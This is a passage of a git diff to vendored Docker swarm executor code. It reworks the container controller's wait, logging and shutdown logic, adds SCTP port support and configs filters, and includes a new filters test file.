 // controller implements agent.Controller against docker's API.
 //
 // Most operations against docker's API are done through the container name,
 // which is unique to the task.
 type controller struct {
-	task    *api.Task
-	adapter *containerAdapter
-	closed  chan struct{}
-	err     error
-
+	task       *api.Task
+	adapter    *containerAdapter
+	closed     chan struct{}
+	err        error
 	pulled     chan struct{} // closed after pull
 	cancelPull func()        // cancels pull context if not nil
 	pullErr    error         // pull error, only read after pulled closed
@@ -43,8 +40,8 @@ type controller struct {
 var _ exec.Controller = &controller{}
 
 // NewController returns a docker exec runner for the provided task.
-func newController(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*controller, error) {
-	adapter, err := newContainerAdapter(b, task, secrets)
+func newController(b executorpkg.Backend, i executorpkg.ImageBackend, v executorpkg.VolumeBackend, task *api.Task, node *api.NodeDescription, dependencies exec.DependencyGetter) (*controller, error) {
+	adapter, err := newContainerAdapter(b, i, v, task, node, dependencies)
 	if err != nil {
 		return nil, err
 	}
@@ -148,7 +145,6 @@ func (r *controller) Prepare(ctx context.Context) error {
 			}
 		}
 	}
-
 	if err := r.adapter.create(ctx); err != nil {
 		if isContainerCreateNameConflict(err) {
 			if _, err := r.adapter.inspect(ctx); err != nil {
@@ -187,7 +183,7 @@ func (r *controller) Start(ctx context.Context) error {
 
 	for {
 		if err := r.adapter.start(ctx); err != nil {
-			if _, ok := err.(libnetwork.ErrNoSuchNetwork); ok {
+			if _, ok := errors.Cause(err).(libnetwork.ErrNoSuchNetwork); ok {
 				// Retry network creation again if we
 				// failed because some of the networks
 				// were not found.
@@ -205,7 +201,7 @@ func (r *controller) Start(ctx context.Context) error {
 	}
 
 	// no health check
-	if ctnr.Config == nil || ctnr.Config.Healthcheck == nil {
+	if ctnr.Config == nil || ctnr.Config.Healthcheck == nil || len(ctnr.Config.Healthcheck.Test) == 0 || ctnr.Config.Healthcheck.Test[0] == "NONE" {
 		if err := r.adapter.activateServiceBinding(); err != nil {
 			log.G(ctx).WithError(err).Errorf("failed to activate service binding for container %s which has no healthcheck config", r.adapter.container.name())
 			return err
@@ -213,12 +209,6 @@ func (r *controller) Start(ctx context.Context) error {
 		return nil
 	}
 
-	healthCmd := ctnr.Config.Healthcheck.Test
-
-	if len(healthCmd) == 0 || healthCmd[0] == "NONE" {
-		return nil
-	}
-
 	// wait for container to be healthy
 	eventq := r.adapter.events(ctx)
 
@@ -287,30 +277,50 @@ func (r *controller) Wait(pctx context.Context) error {
 		}
 	}()
 
-	err := r.adapter.wait(ctx)
-	if ctx.Err() != nil {
-		return ctx.Err()
+	waitC, err := r.adapter.wait(ctx)
+	if err != nil {
+		return err
 	}
 
-	if err != nil {
-		ee := &exitError{}
-		if ec, ok := err.(exec.ExitCoder); ok {
-			ee.code = ec.ExitCode()
+	if status := <-waitC; status.ExitCode() != 0 {
+		exitErr := &exitError{
+			code: status.ExitCode(),
 		}
+
+		// Set the cause if it is knowable.
 		select {
 		case e := <-healthErr:
-			ee.cause = e
+			exitErr.cause = e
 		default:
-			if err.Error() != "" {
-				ee.cause = err
+			if status.Err() != nil {
+				exitErr.cause = status.Err()
 			}
 		}
-		return ee
+
+		return exitErr
 	}
 
 	return nil
 }
 
+func (r *controller) hasServiceBinding() bool {
+	if r.task == nil {
+		return false
+	}
+
+	// service is attached to a network besides the default bridge
+	for _, na := range r.task.Networks {
+		if na.Network == nil ||
+			na.Network.DriverState == nil ||
+			na.Network.DriverState.Name == "bridge" && na.Network.Spec.Annotations.Name == "bridge" {
+			continue
+		}
+		return true
+	}
+
+	return false
+}
+
 // Shutdown the container cleanly.
 func (r *controller) Shutdown(ctx context.Context) error {
 	if err := r.checkClosed(); err != nil {
@@ -321,10 +331,18 @@ func (r *controller) Shutdown(ctx context.Context) error {
 		r.cancelPull()
 	}
 
-	// remove container from service binding
-	if err := r.adapter.deactivateServiceBinding(); err != nil {
-		log.G(ctx).WithError(err).Errorf("failed to deactivate service binding for container %s", r.adapter.container.name())
-		return err
+	if r.hasServiceBinding() {
+		// remove container from service binding
+		if err := r.adapter.deactivateServiceBinding(); err != nil {
+			log.G(ctx).WithError(err).Warningf("failed to deactivate service binding for container %s", r.adapter.container.name())
+			// Don't return an error here, because failure to deactivate
+			// the service binding is expected if the container was never
+			// started.
+		}
+
+		// add a delay for gossip converge
+		// TODO(dongluochen): this delay should be configurable to fit different cluster size and network delay.
+		time.Sleep(defaultGossipConvergeDelay)
 	}
 
 	if err := r.adapter.shutdown(ctx); err != nil {
@@ -445,15 +463,27 @@ func (r *controller) Logs(ctx context.Context, publisher exec.LogPublisher, opti
 		return err
 	}
 
-	if err := r.waitReady(ctx); err != nil {
-		return errors.Wrap(err, "container not ready for logs")
+	// if we're following, wait for this container to be ready. there is a
+	// problem here: if the container will never be ready (for example, it has
+	// been totally deleted) then this will wait forever. however, this doesn't
+	// actually cause any UI issues, and shouldn't be a problem. the stuck wait
+	// will go away when the follow (context) is canceled.
+	if options.Follow {
+		if err := r.waitReady(ctx); err != nil {
+			return errors.Wrap(err, "container not ready for logs")
+		}
 	}
+	// if we're not following, we're not gonna wait for the container to be
+	// ready. just call logs. if the container isn't ready, the call will fail
+	// and return an error. no big deal, we don't care, we only want the logs
+	// we can get RIGHT NOW with no follow
 
-	rc, err := r.adapter.logs(ctx, options)
+	logsContext, cancel := context.WithCancel(ctx)
+	msgs, err := r.adapter.logs(logsContext, options)
+	defer cancel()
 	if err != nil {
 		return errors.Wrap(err, "failed getting container logs")
 	}
-	defer rc.Close()
 
 	var (
 		// use a rate limiter to keep things under control but also provides some
@@ -466,53 +496,48 @@ func (r *controller) Logs(ctx context.Context, publisher exec.LogPublisher, opti
 		}
 	)
 
-	brd := bufio.NewReader(rc)
 	for {
-		// so, message header is 8 bytes, treat as uint64, pull stream off MSB
-		var header uint64
-		if err := binary.Read(brd, binary.BigEndian, &header); err != nil {
-			if err == io.EOF {
-				return nil
-			}
-
-			return errors.Wrap(err, "failed reading log header")
+		msg, ok := <-msgs
+		if !ok {
+			// we're done here, no more messages
+			return nil
 		}
 
-		stream, size := (header>>(7<<3))&0xFF, header & ^(uint64(0xFF)<<(7<<3))
+		if msg.Err != nil {
+			// the defered cancel closes the adapter's log stream
+			return msg.Err
+		}
 
-		// limit here to decrease allocation back pressure.
-		if err := limiter.WaitN(ctx, int(size)); err != nil {
+		// wait here for the limiter to catch up
+		if err := limiter.WaitN(ctx, len(msg.Line)); err != nil {
 			return errors.Wrap(err, "failed rate limiter")
 		}
-
-		buf := make([]byte, size)
-		_, err := io.ReadFull(brd, buf)
+		tsp, err := gogotypes.TimestampProto(msg.Timestamp)
 		if err != nil {
-			return errors.Wrap(err, "failed reading buffer")
+			return errors.Wrap(err, "failed to convert timestamp")
 		}
-
-		// Timestamp is RFC3339Nano with 1 space after. Lop, parse, publish
-		parts := bytes.SplitN(buf, []byte(" "), 2)
-		if len(parts) != 2 {
-			return fmt.Errorf("invalid timestamp in log message: %v", buf)
+		var stream api.LogStream
+		if msg.Source == "stdout" {
+			stream = api.LogStreamStdout
+		} else if msg.Source == "stderr" {
+			stream = api.LogStreamStderr
 		}
 
-		ts, err := time.Parse(time.RFC3339Nano, string(parts[0]))
-		if err != nil {
-			return errors.Wrap(err, "failed to parse timestamp")
-		}
-
-		tsp, err := ptypes.TimestampProto(ts)
-		if err != nil {
-			return errors.Wrap(err, "failed to convert timestamp")
+		// parse the details out of the Attrs map
+		var attrs []api.LogAttr
+		if len(msg.Attrs) != 0 {
+			attrs = make([]api.LogAttr, 0, len(msg.Attrs))
+			for _, attr := range msg.Attrs {
+				attrs = append(attrs, api.LogAttr{Key: attr.Key, Value: attr.Value})
+			}
 		}
 
 		if err := publisher.Publish(ctx, api.LogMessage{
 			Context:   msgctx,
 			Timestamp: tsp,
-			Stream:    api.LogStream(stream),
-
-			Data: parts[1],
+			Stream:    stream,
+			Attrs:     attrs,
+			Data:      msg.Line,
 		}); err != nil {
 			return errors.Wrap(err, "failed to publish log message")
 		}
@@ -539,15 +564,8 @@ func (r *controller) matchevent(event events.Message) bool {
 	if event.Type != events.ContainerEventType {
 		return false
 	}
-
-	// TODO(stevvooe): Filter based on ID matching, in addition to name.
-
-	// Make sure the events are for this container.
-	if event.Actor.Attributes["name"] != r.adapter.container.name() {
-		return false
-	}
-
-	return true
+	// we can't filter using id since it will have huge chances to introduce a deadlock. see #33377.
+	return event.Actor.Attributes["name"] == r.adapter.container.name()
 }
 
 func (r *controller) checkClosed() error {
@@ -603,6 +621,8 @@ func parsePortMap(portMap nat.PortMap) ([]*api.PortConfig, error) {
 			protocol = api.ProtocolTCP
 		case "udp":
 			protocol = api.ProtocolUDP
+		case "sctp":
+			protocol = api.ProtocolSCTP
 		default:
 			return nil, fmt.Errorf("invalid protocol: %s", parts[1])
 		}
@@ -641,7 +661,7 @@ func (e *exitError) Error() string {
 }
 
 func (e *exitError) ExitCode() int {
-	return int(e.code)
+	return e.code
 }
 
 func (e *exitError) Cause() error {
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go
index 63e1233566..4c90b9e0a2 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go
@@ -1,15 +1,17 @@
-package container
+package container // import "github.com/docker/docker/daemon/cluster/executor/container"
 
-import "fmt"
+import (
+	"errors"
+)
 
 var (
 	// ErrImageRequired returned if a task is missing the image definition.
-	ErrImageRequired = fmt.Errorf("dockerexec: image required")
+	ErrImageRequired = errors.New("dockerexec: image required")
 
 	// ErrContainerDestroyed returned when a container is prematurely destroyed
 	// during a wait call.
-	ErrContainerDestroyed = fmt.Errorf("dockerexec: container destroyed")
+	ErrContainerDestroyed = errors.New("dockerexec: container destroyed")
 
 	// ErrContainerUnhealthy returned if controller detects the health check failure
-	ErrContainerUnhealthy = fmt.Errorf("dockerexec: unhealthy container")
+	ErrContainerUnhealthy = errors.New("dockerexec: unhealthy container")
 )
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go
index f0dedd4530..940a943e4f 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go
@@ -1,30 +1,47 @@
-package container
+package container // import "github.com/docker/docker/daemon/cluster/executor/container"
 
 import (
+	"context"
+	"fmt"
 	"sort"
 	"strings"
+	"sync"
 
 	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/network"
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/daemon/cluster/controllers/plugin"
+	"github.com/docker/docker/daemon/cluster/convert"
 	executorpkg "github.com/docker/docker/daemon/cluster/executor"
 	clustertypes "github.com/docker/docker/daemon/cluster/provider"
 	networktypes "github.com/docker/libnetwork/types"
+	"github.com/docker/swarmkit/agent"
 	"github.com/docker/swarmkit/agent/exec"
-	"github.com/docker/swarmkit/agent/secrets"
 	"github.com/docker/swarmkit/api"
-	"golang.org/x/net/context"
+	"github.com/docker/swarmkit/api/naming"
+	"github.com/docker/swarmkit/template"
+	"github.com/sirupsen/logrus"
 )
 
 type executor struct {
-	backend executorpkg.Backend
-	secrets exec.SecretsManager
+	backend       executorpkg.Backend
+	imageBackend  executorpkg.ImageBackend
+	pluginBackend plugin.Backend
+	volumeBackend executorpkg.VolumeBackend
+	dependencies  exec.DependencyManager
+	mutex         sync.Mutex // This mutex protects the following node field
+	node          *api.NodeDescription
 }
 
 // NewExecutor returns an executor from the docker client.
-func NewExecutor(b executorpkg.Backend) exec.Executor {
+func NewExecutor(b executorpkg.Backend, p plugin.Backend, i executorpkg.ImageBackend, v executorpkg.VolumeBackend) exec.Executor {
 	return &executor{
-		backend: b,
-		secrets: secrets.NewManager(),
+		backend:       b,
+		pluginBackend: p,
+		imageBackend:  i,
+		volumeBackend: v,
+		dependencies:  agent.NewDependencyManager(),
 	}
 }
 
@@ -51,9 +68,10 @@ func (e *executor) Describe(ctx context.Context) (*api.NodeDescription, error) {
 	// the plugin list by default.
 	addPlugins("Network", append([]string{"overlay"}, info.Plugins.Network...))
 	addPlugins("Authorization", info.Plugins.Authorization)
+	addPlugins("Log", info.Plugins.Log)
 
 	// add v2 plugins
-	v2Plugins, err := e.backend.PluginManager().List()
+	v2Plugins, err := e.backend.PluginManager().List(filters.NewArgs())
 	if err == nil {
 		for _, plgn := range v2Plugins {
 			for _, typ := range plgn.Config.Interface.Types {
@@ -61,11 +79,15 @@ func (e *executor) Describe(ctx context.Context) (*api.NodeDescription, error) {
 					continue
 				}
 				plgnTyp := typ.Capability
-				if typ.Capability == "volumedriver" {
+				switch typ.Capability {
+				case "volumedriver":
 					plgnTyp = "Volume"
-				} else if typ.Capability == "networkdriver" {
+				case "networkdriver":
 					plgnTyp = "Network"
+				case "logdriver":
+					plgnTyp = "Log"
 				}
+
 				plugins[api.PluginDescription{
 					Type: plgnTyp,
 					Name: plgn.Name,
@@ -106,28 +128,59 @@ func (e *executor) Describe(ctx context.Context) (*api.NodeDescription, error) {
 		Resources: &api.Resources{
 			NanoCPUs:    int64(info.NCPU) * 1e9,
 			MemoryBytes: info.MemTotal,
+			Generic:     convert.GenericResourcesToGRPC(info.GenericResources),
 		},
 	}
 
+	// Save the node information in the executor field
+	e.mutex.Lock()
+	e.node = description
+	e.mutex.Unlock()
+
 	return description, nil
 }
 
 func (e *executor) Configure(ctx context.Context, node *api.Node) error {
-	na := node.Attachment
-	if na == nil {
-		return nil
+	var ingressNA *api.NetworkAttachment
+	attachments := make(map[string]string)
+
+	for _, na := range node.Attachments {
+		if na == nil || na.Network == nil || len(na.Addresses) == 0 {
+			// this should not happen, but we got a panic here and don't have a
+			// good idea about what the underlying data structure looks like.
+			logrus.WithField("NetworkAttachment", fmt.Sprintf("%#v", na)).
+				Warnf("skipping nil or malformed node network attachment entry")
+			continue
+		}
+
+		if na.Network.Spec.Ingress {
+			ingressNA = na
+		}
+
+		attachments[na.Network.ID] = na.Addresses[0]
+	}
+
+	if (ingressNA == nil) && (node.Attachment != nil) && (len(node.Attachment.Addresses) > 0) {
+		ingressNA = node.Attachment
+		attachments[ingressNA.Network.ID] = ingressNA.Addresses[0]
+	}
+
+	if ingressNA == nil {
+		e.backend.ReleaseIngress()
+		return e.backend.GetAttachmentStore().ResetAttachments(attachments)
 	}
 
 	options := types.NetworkCreate{
-		Driver: na.Network.DriverState.Name,
+		Driver: ingressNA.Network.DriverState.Name,
 		IPAM: &network.IPAM{
-			Driver: na.Network.IPAM.Driver.Name,
+			Driver: ingressNA.Network.IPAM.Driver.Name,
 		},
-		Options:        na.Network.DriverState.Options,
+		Options:        ingressNA.Network.DriverState.Options,
+		Ingress:        true,
 		CheckDuplicate: true,
 	}
 
-	for _, ic := range na.Network.IPAM.Configs {
+	for _, ic := range ingressNA.Network.IPAM.Configs {
 		c := network.IPAMConfig{
 			Subnet:  ic.Subnet,
 			IPRange: ic.Range,
@@ -136,24 +189,66 @@ func (e *executor) Configure(ctx context.Context, node *api.Node) error {
 		options.IPAM.Config = append(options.IPAM.Config, c)
 	}
 
-	return e.backend.SetupIngress(clustertypes.NetworkCreateRequest{
-		na.Network.ID,
-		types.NetworkCreateRequest{
-			Name:          na.Network.Spec.Annotations.Name,
+	_, err := e.backend.SetupIngress(clustertypes.NetworkCreateRequest{
+		ID: ingressNA.Network.ID,
+		NetworkCreateRequest: types.NetworkCreateRequest{
+			Name:          ingressNA.Network.Spec.Annotations.Name,
 			NetworkCreate: options,
 		},
-	}, na.Addresses[0])
+	}, ingressNA.Addresses[0])
+	if err != nil {
+		return err
+	}
+
+	return e.backend.GetAttachmentStore().ResetAttachments(attachments)
 }
 
 // Controller returns a docker container runner.
 func (e *executor) Controller(t *api.Task) (exec.Controller, error) {
+	dependencyGetter := template.NewTemplatedDependencyGetter(agent.Restrict(e.dependencies, t), t, nil)
+
+	// Get the node description from the executor field
+	e.mutex.Lock()
+	nodeDescription := e.node
+	e.mutex.Unlock()
+
 	if t.Spec.GetAttachment() != nil {
-		return newNetworkAttacherController(e.backend, t, e.secrets)
+		return newNetworkAttacherController(e.backend, e.imageBackend, e.volumeBackend, t, nodeDescription, dependencyGetter)
 	}
 
-	ctlr, err := newController(e.backend, t, e.secrets)
-	if err != nil {
-		return nil, err
+	var ctlr exec.Controller
+	switch r := t.Spec.GetRuntime().(type) {
+	case *api.TaskSpec_Generic:
+		logrus.WithFields(logrus.Fields{
+			"kind":     r.Generic.Kind,
+			"type_url": r.Generic.Payload.TypeUrl,
+		}).Debug("custom runtime requested")
+		runtimeKind, err := naming.Runtime(t.Spec)
+		if err != nil {
+			return ctlr, err
+		}
+		switch runtimeKind {
+		case string(swarmtypes.RuntimePlugin):
+			info, _ := e.backend.SystemInfo()
+			if !info.ExperimentalBuild {
+				return ctlr, fmt.Errorf("runtime type %q only supported in experimental", swarmtypes.RuntimePlugin)
+			}
+			c, err := plugin.NewController(e.pluginBackend, t)
+			if err != nil {
+				return ctlr, err
+			}
+			ctlr = c
+		default:
+			return ctlr, fmt.Errorf("unsupported runtime type: %q", runtimeKind)
+		}
+	case *api.TaskSpec_Container:
+		c, err := newController(e.backend, e.imageBackend, e.volumeBackend, t, nodeDescription, dependencyGetter)
+		if err != nil {
+			return ctlr, err
+		}
+		ctlr = c
+	default:
+		return ctlr, fmt.Errorf("unsupported runtime: %q", r)
 	}
 
 	return ctlr, nil
@@ -177,7 +272,11 @@ func (e *executor) SetNetworkBootstrapKeys(keys []*api.EncryptionKey) error {
 }
 
 func (e *executor) Secrets() exec.SecretsManager {
-	return e.secrets
+	return e.dependencies.Secrets()
+}
+
+func (e *executor) Configs() exec.ConfigsManager {
+	return e.dependencies.Configs()
 }
 
 type sortedPlugins []api.PluginDescription
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go
index 99cf7502af..03d6273635 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go
@@ -1,8 +1,9 @@
 // +build !windows
 
-package container
+package container // import "github.com/docker/docker/daemon/cluster/executor/container"
 
 import (
+	"context"
 	"testing"
 	"time"
 
@@ -11,7 +12,6 @@ import (
 	"github.com/docker/docker/daemon"
 	"github.com/docker/docker/daemon/events"
 	"github.com/docker/swarmkit/api"
-	"golang.org/x/net/context"
 )
 
 func TestHealthStates(t *testing.T) {
@@ -38,14 +38,12 @@ func TestHealthStates(t *testing.T) {
 	}
 
 	c := &container.Container{
-		CommonContainer: container.CommonContainer{
-			ID:   "id",
-			Name: "name",
-			Config: &containertypes.Config{
-				Image: "image_name",
-				Labels: map[string]string{
-					"com.docker.swarm.task.id": "id",
-				},
+		ID:   "id",
+		Name: "name",
+		Config: &containertypes.Config{
+			Image: "image_name",
+			Labels: map[string]string{
+				"com.docker.swarm.task.id": "id",
 			},
 		},
 	}
@@ -54,7 +52,7 @@ func TestHealthStates(t *testing.T) {
 		EventsService: e,
 	}
 
-	controller, err := newController(daemon, task, nil)
+	controller, err := newController(daemon, nil, nil, task, nil, nil)
 	if err != nil {
 		t.Fatalf("create controller fail %v", err)
 	}
@@ -87,7 +85,7 @@ func TestHealthStates(t *testing.T) {
 			}
 		case <-timer.C:
 			if expectedErr != nil {
-				t.Fatalf("time limit exceeded, didn't get expected error")
+				t.Fatal("time limit exceeded, didn't get expected error")
 			}
 		}
 	}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go
index 5fda1f2edb..cbe1f53c38 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go
@@ -1,6 +1,7 @@
-package container
+package container // import "github.com/docker/docker/daemon/cluster/executor/container"
 
 import (
+	"errors"
 	"fmt"
 	"path/filepath"
 
@@ -29,7 +30,7 @@ func validateMounts(mounts []api.Mount) error {
 			}
 		case api.MountTypeTmpfs:
 			if mount.Source != "" {
-				return fmt.Errorf("invalid tmpfs source, source must be empty")
+				return errors.New("invalid tmpfs source, source must be empty")
 			}
 		default:
 			return fmt.Errorf("invalid mount type: %s", mount.Type)
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go
index 9d98e2c008..5e4694ff1b 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go
@@ -1,4 +1,4 @@
-package container
+package container // import "github.com/docker/docker/daemon/cluster/executor/container"
 
 import (
 	"io/ioutil"
@@ -12,7 +12,7 @@ import (
 )
 
 func newTestControllerWithMount(m api.Mount) (*controller, error) {
-	return newController(&daemon.Daemon{}, &api.Task{
+	return newController(&daemon.Daemon{}, nil, nil, &api.Task{
 		ID:        stringid.GenerateRandomID(),
 		ServiceID: stringid.GenerateRandomID(),
 		Spec: api.TaskSpec{
@@ -26,7 +26,8 @@ func newTestControllerWithMount(m api.Mount) (*controller, error) {
 				},
 			},
 		},
-	}, nil)
+	}, nil,
+		nil)
 }
 
 func TestControllerValidateMountBind(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go
index c616eeef93..7a3f053621 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package container
+package container // import "github.com/docker/docker/daemon/cluster/executor/container"
 
 const (
 	testAbsPath        = "/foo"
diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go
index c346451d3d..6ee4c96431 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go
@@ -1,6 +1,6 @@
 // +build windows
 
-package container
+package container // import "github.com/docker/docker/daemon/cluster/executor/container"
 
 const (
 	testAbsPath        = `c:\foo`
diff --git a/vendor/github.com/docker/docker/daemon/cluster/filters.go b/vendor/github.com/docker/docker/daemon/cluster/filters.go
index 88668edaac..15469f907d 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/filters.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/filters.go
@@ -1,4 +1,4 @@
-package cluster
+package cluster // import "github.com/docker/docker/daemon/cluster"
 
 import (
 	"fmt"
@@ -45,22 +45,6 @@ func newListNodesFilters(filter filters.Args) (*swarmapi.ListNodesRequest_Filter
 	return f, nil
 }
 
-func newListServicesFilters(filter filters.Args) (*swarmapi.ListServicesRequest_Filters, error) {
-	accepted := map[string]bool{
-		"name":  true,
-		"id":    true,
-		"label": true,
-	}
-	if err := filter.Validate(accepted); err != nil {
-		return nil, err
-	}
-	return &swarmapi.ListServicesRequest_Filters{
-		NamePrefixes: filter.Get("name"),
-		IDPrefixes:   filter.Get("id"),
-		Labels:       runconfigopts.ConvertKVStringsToMap(filter.Get("label")),
-	}, nil
-}
-
 func newListTasksFilters(filter filters.Args, transformFunc func(filters.Args) error) (*swarmapi.ListTasksRequest_Filters, error) {
 	accepted := map[string]bool{
 		"name":          true,
@@ -69,6 +53,11 @@ func newListTasksFilters(filter filters.Args, transformFunc func(filters.Args) e
 		"service":       true,
 		"node":          true,
 		"desired-state": true,
+		// UpToDate is not meant to be exposed to users. It's for
+		// internal use in checking create/update progress. Therefore,
+		// we prefix it with a '_'.
+		"_up-to-date": true,
+		"runtime":     true,
 	}
 	if err := filter.Validate(accepted); err != nil {
 		return nil, err
@@ -84,6 +73,8 @@ func newListTasksFilters(filter filters.Args, transformFunc func(filters.Args) e
 		Labels:       runconfigopts.ConvertKVStringsToMap(filter.Get("label")),
 		ServiceIDs:   filter.Get("service"),
 		NodeIDs:      filter.Get("node"),
+		UpToDate:     len(filter.Get("_up-to-date")) != 0,
+		Runtimes:     filter.Get("runtime"),
 	}
 
 	for _, s := range filter.Get("desired-state") {
@@ -114,3 +105,19 @@ func newListSecretsFilters(filter filters.Args) (*swarmapi.ListSecretsRequest_Fi
 		Labels:       runconfigopts.ConvertKVStringsToMap(filter.Get("label")),
 	}, nil
 }
+
+func newListConfigsFilters(filter filters.Args) (*swarmapi.ListConfigsRequest_Filters, error) {
+	accepted := map[string]bool{
+		"name":  true,
+		"id":    true,
+		"label": true,
+	}
+	if err := filter.Validate(accepted); err != nil {
+		return nil, err
+	}
+	return &swarmapi.ListConfigsRequest_Filters{
+		NamePrefixes: filter.Get("name"),
+		IDPrefixes:   filter.Get("id"),
+		Labels:       runconfigopts.ConvertKVStringsToMap(filter.Get("label")),
+	}, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/filters_test.go b/vendor/github.com/docker/docker/daemon/cluster/filters_test.go
new file mode 100644
index 0000000000..a38feeaaf7
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/filters_test.go
@@ -0,0 +1,102 @@
+package cluster // import "github.com/docker/docker/daemon/cluster"
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types/filters"
+)
+
+func TestNewListSecretsFilters(t *testing.T) {
+	validNameFilter := filters.NewArgs()
+	validNameFilter.Add("name", "test_name")
+
+	validIDFilter := filters.NewArgs()
+	validIDFilter.Add("id", "7c9009d6720f6de3b492f5")
+
+	validLabelFilter := filters.NewArgs()
+	validLabelFilter.Add("label", "type=test")
+	validLabelFilter.Add("label", "storage=ssd")
+	validLabelFilter.Add("label", "memory")
+
+	validNamesFilter := filters.NewArgs()
+	validNamesFilter.Add("names", "test_name")
+
+	validAllFilter := filters.NewArgs()
+	validAllFilter.Add("name", "nodeName")
+	validAllFilter.Add("id", "7c9009d6720f6de3b492f5")
+	validAllFilter.Add("label", "type=test")
+	validAllFilter.Add("label", "memory")
+	validAllFilter.Add("names", "test_name")
+
+	validFilters := []filters.Args{
+		validNameFilter,
+		validIDFilter,
+		validLabelFilter,
+		validNamesFilter,
+		validAllFilter,
+	}
+
+	invalidTypeFilter := filters.NewArgs()
+	invalidTypeFilter.Add("nonexist", "aaaa")
+
+	invalidFilters := []filters.Args{
+		invalidTypeFilter,
+	}
+
+	for _, filter := range validFilters {
+		if _, err := newListSecretsFilters(filter); err != nil {
+			t.Fatalf("Should get no error, got %v", err)
+		}
+	}
+
+	for _, filter := range invalidFilters {
+		if _, err := newListSecretsFilters(filter); err == nil {
+			t.Fatalf("Should get an error for filter %v, while got nil", filter)
+		}
+	}
+}
+
+func TestNewListConfigsFilters(t *testing.T) {
+	validNameFilter := filters.NewArgs()
+	validNameFilter.Add("name", "test_name")
+
+	validIDFilter := filters.NewArgs()
+	validIDFilter.Add("id", "7c9009d6720f6de3b492f5")
+
+	validLabelFilter := filters.NewArgs()
+	validLabelFilter.Add("label", "type=test")
+	validLabelFilter.Add("label", "storage=ssd")
+	validLabelFilter.Add("label", "memory")
+
+	validAllFilter := filters.NewArgs()
+	validAllFilter.Add("name", "nodeName")
+	validAllFilter.Add("id", "7c9009d6720f6de3b492f5")
+	validAllFilter.Add("label", "type=test")
+	validAllFilter.Add("label", "memory")
+
+	validFilters := []filters.Args{
+		validNameFilter,
+		validIDFilter,
+		validLabelFilter,
+		validAllFilter,
+	}
+
+	invalidTypeFilter := filters.NewArgs()
+	invalidTypeFilter.Add("nonexist", "aaaa")
+
+	invalidFilters := []filters.Args{
+		invalidTypeFilter,
+	}
+
+	for _, filter := range validFilters {
+		if _, err := newListConfigsFilters(filter); err != nil {
+			t.Fatalf("Should get no error, got %v", err)
+		}
+	}
+
+	for _, filter := range invalidFilters {
+		if _, err := newListConfigsFilters(filter); err == nil {
+			t.Fatalf("Should get an error for filter %v, while got nil", filter)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/helpers.go b/vendor/github.com/docker/docker/daemon/cluster/helpers.go
index be5bf56e87..653593e1c0 100644
--- a/vendor/github.com/docker/docker/daemon/cluster/helpers.go
+++ b/vendor/github.com/docker/docker/daemon/cluster/helpers.go
@@ -1,10 +1,12 @@
-package cluster
+package cluster // import "github.com/docker/docker/daemon/cluster"
 
 import (
+	"context"
 	"fmt"
 
+	"github.com/docker/docker/errdefs"
 	swarmapi "github.com/docker/swarmkit/api"
-	"golang.org/x/net/context"
+	"github.com/pkg/errors"
 )
 
 func getSwarm(ctx context.Context, c swarmapi.ControlClient) (*swarmapi.Cluster, error) {
@@ -14,7 +16,7 @@ func getSwarm(ctx context.Context, c swarmapi.ControlClient) (*swarmapi.Cluster,
 	}
 
 	if len(rl.Clusters) == 0 {
-		return nil, fmt.Errorf("swarm not found")
+		return nil, errors.WithStack(errNoSwarm)
 	}
 
 	// TODO: assume one cluster only
@@ -23,86 +25,222 @@ func getSwarm(ctx context.Context, c swarmapi.ControlClient) (*swarmapi.Cluster,
 
 func getNode(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Node, error) {
 	// GetNode to match via full ID.
-	rg, err := c.GetNode(ctx, &swarmapi.GetNodeRequest{NodeID: input})
-	if err != nil {
-		// If any error (including NotFound), ListNodes to match via full name.
